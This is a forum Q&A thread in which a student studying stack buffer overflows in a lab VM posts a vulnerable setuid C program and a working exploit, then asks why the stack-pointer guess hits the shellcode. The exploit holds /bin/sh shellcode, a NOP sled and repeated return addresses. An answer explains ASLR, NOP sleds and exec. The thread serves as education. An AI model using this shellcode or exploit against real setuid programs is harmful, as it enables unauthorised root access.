1
votes

I'm a computer engineering student who is studying how stack buffer overflows work. The book I'm reading is The Art of Exploitation (1st edition) by Jon Erickson. In order to practice what I'm studying I've installed Damn Vulnerable Linux distribution in a virtual machine. I've disabled ASRL (kernel.randomize_va_space = 0), I've compiled the following codes with GCC 3.4.6, I'm using GDB 6.6 and the kernel of the distribution is 2.6.20. My computer has an Intel processor. The vulnerable program (test2) is created by root and is set as setuid.

The vulnerable code is the following:

//test2.c
int main(int argc, char *argv[])
{
char buffer[500];

strcpy(buffer, argv[1]);

return 0;
}

While the exploit code, created by normal (non root) user, is the following:

//main.c
#include <stdlib.h>

char shellcode[] =
"\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";

unsigned long sp(void)
{
__asm__("movl %esp, %eax");
}

int main(int argc, char *argv[])
{
int i, offset;
long esp, ret, *addr_ptr;
char *buffer2, *ptr;

offset = 0;
esp = sp();

ret = esp - offset;

printf("Stack pointer (ESP) : 0x%x\n", esp);
printf(" Offset from ESP : 0x%x\n", offset);
printf("Desired Return Addr : 0x%x\n", ret);

buffer2 = malloc(600);

ptr = buffer2;
addr_ptr = (long *)ptr;
for (i = 0; i < 600; i += 4)
{
*(addr_ptr++) = ret;
}

for (i = 0; i < 200; i++)
{
buffer2[i] = '\x90';
}

ptr = buffer2 + 200;
for (i = 0; i < strlen(shellcode); i++)
{
*(ptr++) = shellcode[i];
}

buffer2[600 - 1] = 0;
execl("/root/workspace/test2/Release/test2", "test2", buffer2, 0);

free(buffer2);

return 0;
}

The program works, it exploits the buffer overflow vulnerability in test2 and gives me a root shell. What I don't understand, even after reading the book several times and trying to find answers on the internet, is why the value of the stack pointer that we store in the variable esp is the return address of our shellcode. I've disassembled the program with GDB and everything works as the author says but I don't understand why this happens.

I would have liked to show you how the disassembled program looked like and how the memory looked like during execution, but I cannot copy/paste from the guest machine on the virtual machine and I'm not allowed to insert images in my question. So I can only try to describe what happens during execution of the program main (the one that exploits the BOF in test2):

disassembling main, I see that 28 bytes are allocated on the stack (7 variables * 4 bytes). Then the function sp() is called and the value of the stack pointer is stored in esp. The value stored in the variable esp is 0xbffff344. Then, as you can see, we have some printf, we store the payload in buffer2 and then we call the execl function passing buffer2 as an argument.

now the root shell shows up and then the program exits. Disassembling the program after setting a different offset, I can clearly see that 0xbffff344 is precisely the address where the payload is stored when test2 is executed. Could you explain me how does this happen? Does execl sets a new stack frame for the test2 program? In main.c only 28 bytes are allocated on the stack, while in test2 500 bytes are allocated on the stack (for buffer2). So how do I know that the stack pointer that i get in main.c is precisely the return address of the shellcode?

I thank you and apologize if I wrote some stupid things.

1

1 Answers

2
votes

Could you explain me how does this happen?

When ASLR is disabled every executable starts at the same address, so given the stack pointer you are able to guess the required offset to find your buffer location in test2. This is also where the NOP sled becomes useful, since it give you multiple possible hit if the offset is not the exact displacement to the shellcode.

That being said the fact the the value of ESP in the main function of your exploit program IS the location of the executed buffer in test2 seems incorrect. Are you sure you just don't misinterpreted gdb results?

You should be able to compute the offset of the buffer using the following : esp - 500 + 28.

Note that you should always wear gloves when using such formula : how the compiler handles locals, (size, order, etc) can vary.

So how do I know that the stack pointer that i get in main.c is precisely the return address of the shellcode?

Well You don't. It depends of the machine, how the program was compiled etc.

Does execl sets a new stack frame for the test2 program?

From the execve man pages :

The exec family of functions shall replace the current process image with a new process image. The new image shall be constructed from a regular, executable file called the new process image file. There shall be no return from a successful exec, because the calling process image is overlaid by the new process image.

The stack is overridden by a new one for test2.

Hope it helps :)